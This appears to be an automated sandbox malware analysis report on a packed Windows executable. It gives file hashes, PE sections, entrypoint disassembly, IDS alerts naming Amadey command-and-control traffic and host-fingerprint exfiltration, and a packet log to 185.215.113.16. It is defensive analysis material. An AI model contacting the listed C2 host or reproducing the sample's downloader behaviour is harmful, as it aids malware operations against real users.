                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:......b....M..mZ....F.......<... .....s.......... ....................9.C.:.\.U.s.e.r.s.\.j.o.n.e.s.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.4.4.1.1.1.d.b.c.4.9.\.a.x.p.l.o.n.g...e.x.e.........J.O.N.E.S.-.P.C.\.j.o.n.e.s...................0.................*.@3P.........................

                                                                                                                                                                \Device\ConDrv

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Windows\System32\curl.exe
                                                                                                                                                                File Type:ASCII text, with CR, LF line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):399
                                                                                                                                                                Entropy (8bit):3.2346623411205235
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:6:I2swj2SAykymUeg/8Uni1qSgOgcdSgOgc/0ImsIB1o:Vz6ykymUexb1U9cL9c/0Imp0
                                                                                                                                                                MD5:4FB92084B3D98C91E11E366B62C1ECB6
                                                                                                                                                                SHA1:2DB34F466698A87C6036FF803008EF4EAD25EAA6
                                                                                                                                                                SHA-256:44F02E748FC48EBF2E846798DA0DD204614796FAC663795B340697BA9ECDF0DA
                                                                                                                                                                SHA-512:8FF4E417A5929E07995A7CC53BC366313803D9D13CEC8E4397C91D662893CB9A06E1365BE0CE64AF0B3E3B17069712136918D1B38EFBD17EF847B8878DD8E38D
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview: % Total % Received % Xferd Average Speed Time Time Time Current.. Dload Upload Total Spent Left Speed... 0 0 0 0 0 0 0 0 --:--:-- --:--:-- --:--:-- 0. 0 0 0 0 0 0 0 0 --:--:-- --:--:-- --:--:-- 0.100 45056 100 45056 0 0 33893 0 0:00:01 0:00:01 --:--:-- 33927..

                                                                                                                                                                \Device\Null

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Windows\System32\cmd.exe
                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):63
                                                                                                                                                                Entropy (8bit):4.726581708905135
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:3:9ZwOt+kiE2J5xAIluxLE:9twkn23floE
                                                                                                                                                                MD5:1441DF213253942408FB7892349549D0
                                                                                                                                                                SHA1:2421D1DE1A34D83D4044A30EAC57824AF6978D45
                                                                                                                                                                SHA-256:099F17A7C5F91BE0BDD7A1D10E33A34BDBCE5E45AB8C9ABE1CCACDCF3805C23C
                                                                                                                                                                SHA-512:032B3B9AA352546C18B94A7B87919525948366B7FB105142D425A8C56489CF756AE3D204C31A9840A4299169856C7AF8A7C0A21ECDE703555FAD10F7C6E5C04E
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:Could Not Find C:\Users\user\AppData\Local\Temp\miner2.0.exe..

                                                                                                                                                                Static File Info

                                                                                                                                                                General

                                                                                                                                                                File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                Entropy (8bit):7.950142025223752
                                                                                                                                                                TrID:
                                                                                                                                                                • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                                • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                File name:file.exe
                                                                                                                                                                File size:1'862'656 bytes
                                                                                                                                                                MD5:dc730eea0eba910485703a74d173f8e2
                                                                                                                                                                SHA1:093f63548d7366b6c3cbfc3ddfca453199e40eca
                                                                                                                                                                SHA256:18894a1a879e0e75c33ec7988c8835b20b42a3fae8c51f1cb4f026f2b855a6b7
                                                                                                                                                                SHA512:f1726fae08f206b07ac87ecf890059e98b110a1db0c72add91b89ebbbb5e8d431aacfe31c37028db3cf52eefb7a6bdfc137122b82c7b10dd87e6800a641f933d
                                                                                                                                                                SSDEEP:49152:Rf036dyCkdyKg1Il+5elMr8JYPDaLObL:R06dyR9oIlFlMr5V
                                                                                                                                                                TLSH:E18533AFE0510546CDEE033B0E0ED1CE372249479DD66F1801FCA5664BF2E669B5BB09
                                                                                                                                                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........PJ.r>..r>..r>...=..r>...;.(r>.].:..r>.].=..r>.].;..r>...:..r>...?..r>..r?.^r>...7..r>......r>...<..r>.Rich.r>................

                                                                                                                                                                File Icon

                                                                                                                                                                Icon Hash:90cececece8e8eb0

                                                                                                                                                                Static PE Info

                                                                                                                                                                General

                                                                                                                                                                Entrypoint:0x8a1000
                                                                                                                                                                Entrypoint Section:.taggant
                                                                                                                                                                Digitally signed:false
                                                                                                                                                                Imagebase:0x400000
                                                                                                                                                                Subsystem:windows gui
                                                                                                                                                                Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                                                DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                                                                                                                                                Time Stamp:0x66A240BE [Thu Jul 25 12:10:38 2024 UTC]
                                                                                                                                                                TLS Callbacks:
                                                                                                                                                                CLR (.Net) Version:
                                                                                                                                                                OS Version Major:6
                                                                                                                                                                OS Version Minor:0
                                                                                                                                                                File Version Major:6
                                                                                                                                                                File Version Minor:0
                                                                                                                                                                Subsystem Version Major:6
                                                                                                                                                                Subsystem Version Minor:0
                                                                                                                                                                Import Hash:2eabe9054cad5152567f0699947a2c5b

                                                                                                                                                                Entrypoint Preview

                                                                                                                                                                Instruction
                                                                                                                                                                jmp 00007FF624C12C6Ah
                                                                                                                                                                cmovp ebx, dword ptr [eax+eax]
                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                jmp 00007FF624C14C65h
                                                                                                                                                                add byte ptr [edi], al
                                                                                                                                                                or al, byte ptr [eax]
                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                add byte ptr [eax], dh
                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                add byte ptr [eax], ah
                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                add byte ptr [ecx], ah
                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                add byte ptr [edi], al
                                                                                                                                                                or al, byte ptr [eax]
                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                add byte ptr [edi], al
                                                                                                                                                                add byte ptr [eax], 00000000h
                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                adc byte ptr [eax], al
                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                push es
                                                                                                                                                                or al, byte ptr [eax]
                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                add byte ptr [eax], al

                                                                                                                                                                Data Directories

                                                                                                                                                                NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_IMPORT0x6a0570x6b.idata
                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_RESOURCE0x690000x1e0.rsrc
                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_BASERELOC0x49efd80x10nataabbx
                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_TLS0x49ef880x18nataabbx
                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                                                Sections

                                                                                                                                                                NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                0x10000x680000x2de003cb1062382225bc2111b9f01c0a83d78False0.9973763198228883data7.9826212288436125IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                .rsrc0x690000x1e00x200e6a31155863748b138ce7f3105aef787False0.580078125data4.538879761011263IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                .idata 0x6a0000x10000x200cc76e3822efdc911f469a3e3cc9ce9feFalse0.1484375data1.0428145631430756IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                0x6b0000x29f0000x2009a9f6632af5b734a7f5d7a363bbf3f70unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                nataabbx0x30a0000x1960000x195200b0c6547f32088cd5197f91be5b44a0b3False0.9948613709117556data7.954246533814316IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                ijueevze0x4a00000x10000x40026fc48c0552627760abd3c81844dfe2bFalse0.80078125data6.188713023531078IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                .taggant0x4a10000x30000x22004b3055efcac4608bf6df5682287edf82False0.06353400735294118DOS executable (COM)0.694309447560145IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

                                                                                                                                                                Resources

                                                                                                                                                                NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                                RT_MANIFEST0x49efe80x17dXML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.5931758530183727

                                                                                                                                                                Imports

                                                                                                                                                                DLLImport
                                                                                                                                                                kernel32.dlllstrcpy

                                                                                                                                                                Possible Origin

                                                                                                                                                                Language of compilation systemCountry where language is spokenMap
                                                                                                                                                                EnglishUnited States

                                                                                                                                                                Network Behavior

                                                                                                                                                                Suricata IDS Alerts

                                                                                                                                                                TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                                                2024-09-27T17:42:03.185010+02002856147ETPRO MALWARE Amadey CnC Activity M31192.168.2.449737185.215.113.1680TCP
                                                                                                                                                                2024-09-27T17:42:03.422402+02002856122ETPRO MALWARE Amadey CnC Response M11185.215.113.1680192.168.2.449737TCP
                                                                                                                                                                2024-09-27T17:42:03.636291+02002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.449737185.215.113.1680TCP
                                                                                                                                                                2024-09-27T17:42:05.763405+02002044696ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M21192.168.2.449738185.215.113.1680TCP

                                                                                                                                                                Network Port Distribution

                                                                                                                                                                TCP Packets

                                                                                                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                Sep 27, 2024 17:42:02.474972010 CEST4973780192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:02.480042934 CEST8049737185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:02.480129004 CEST4973780192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:02.480288982 CEST4973780192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:02.485177994 CEST8049737185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:03.184892893 CEST8049737185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:03.185009956 CEST4973780192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:03.186999083 CEST4973780192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:03.191853046 CEST8049737185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:03.414268017 CEST8049737185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:03.414423943 CEST4973780192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:03.417568922 CEST4973780192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:03.422401905 CEST8049737185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:03.636137009 CEST8049737185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:03.636178970 CEST8049737185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:03.636214018 CEST8049737185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:03.636246920 CEST8049737185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:03.636279106 CEST8049737185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:03.636291027 CEST4973780192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:03.636312962 CEST8049737185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:03.636348009 CEST8049737185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:03.636379957 CEST8049737185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:03.636382103 CEST4973780192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:03.636382103 CEST4973780192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:03.636394978 CEST4973780192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:03.636411905 CEST8049737185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:03.636450052 CEST8049737185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:03.636471987 CEST4973780192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:03.636471987 CEST4973780192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:03.636497974 CEST8049737185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:03.636533976 CEST8049737185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:03.636578083 CEST4973780192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:03.636578083 CEST4973780192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:03.636605024 CEST4973780192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:03.724539995 CEST8049737185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:03.724553108 CEST8049737185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:03.724647999 CEST4973780192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:03.724647999 CEST4973780192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:03.766791105 CEST8049737185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:03.766855001 CEST8049737185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:03.766886950 CEST8049737185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:03.766902924 CEST4973780192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:03.766938925 CEST8049737185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:03.766940117 CEST4973780192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:03.766978979 CEST4973780192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:03.767019033 CEST8049737185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:03.767065048 CEST4973780192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:03.767323017 CEST8049737185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:03.767353058 CEST8049737185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:03.767371893 CEST4973780192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:03.767399073 CEST4973780192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:03.767416000 CEST8049737185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:03.767451048 CEST8049737185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:03.767462015 CEST4973780192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:03.767482996 CEST8049737185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:03.767497063 CEST4973780192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:03.767517090 CEST8049737185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:03.767528057 CEST4973780192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:03.767571926 CEST4973780192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:03.768090963 CEST8049737185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:03.768122911 CEST8049737185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:03.768141031 CEST4973780192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:03.768172979 CEST4973780192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:03.768177032 CEST8049737185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:03.768223047 CEST4973780192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:03.768234015 CEST8049737185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:03.768270969 CEST8049737185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:03.768280029 CEST4973780192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:03.768313885 CEST4973780192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:03.768929005 CEST8049737185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:03.768961906 CEST8049737185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:03.768996954 CEST8049737185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:03.769036055 CEST4973780192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:03.769036055 CEST4973780192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:03.769046068 CEST8049737185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:03.769068956 CEST4973780192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:03.769079924 CEST8049737185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:03.769093037 CEST4973780192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:03.769124031 CEST4973780192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:03.769779921 CEST8049737185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:03.769813061 CEST8049737185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:03.769821882 CEST4973780192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:03.769855976 CEST4973780192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:03.853353977 CEST8049737185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:03.853425026 CEST4973780192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:03.853543043 CEST8049737185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:03.853585005 CEST4973780192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:03.891067982 CEST8049737185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:03.891102076 CEST8049737185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:03.891134977 CEST8049737185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:03.891168118 CEST8049737185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:03.891170025 CEST4973780192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:03.891196012 CEST4973780192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:03.891237020 CEST8049737185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:03.891238928 CEST4973780192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:03.891282082 CEST4973780192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:03.891288042 CEST8049737185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:03.891319990 CEST8049737185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:03.891328096 CEST4973780192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:03.891352892 CEST8049737185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:03.891360998 CEST4973780192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:03.891397953 CEST4973780192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:03.891902924 CEST8049737185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:03.891952991 CEST8049737185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:03.891952991 CEST4973780192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:03.891984940 CEST8049737185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:03.892000914 CEST4973780192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:03.892016888 CEST8049737185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:03.892030001 CEST4973780192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:03.892050028 CEST8049737185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:03.892061949 CEST4973780192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:03.892093897 CEST4973780192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:03.892385006 CEST8049737185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:03.892431974 CEST4973780192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:03.892436981 CEST8049737185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:03.892469883 CEST8049737185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:03.892481089 CEST4973780192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:03.892517090 CEST4973780192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:03.892518997 CEST8049737185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:03.892550945 CEST8049737185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:03.892564058 CEST4973780192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:03.892584085 CEST8049737185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:03.892594099 CEST4973780192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:03.892632961 CEST4973780192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:03.893337011 CEST8049737185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:03.893388033 CEST4973780192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:03.893388033 CEST8049737185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:03.893431902 CEST4973780192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:03.893438101 CEST8049737185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:03.893471003 CEST8049737185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:03.893482924 CEST4973780192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:03.893501997 CEST8049737185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:03.893516064 CEST4973780192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:03.893536091 CEST8049737185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:03.893543005 CEST4973780192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:03.893578053 CEST4973780192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:03.894218922 CEST8049737185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:03.894268990 CEST8049737185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:03.894272089 CEST4973780192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:03.894301891 CEST8049737185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:03.894313097 CEST4973780192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:03.894341946 CEST4973780192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:03.894351006 CEST8049737185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:03.894382954 CEST8049737185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:03.894399881 CEST4973780192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:03.894416094 CEST8049737185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:03.894427061 CEST4973780192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:03.894462109 CEST4973780192.168.2.4185.215.113.16
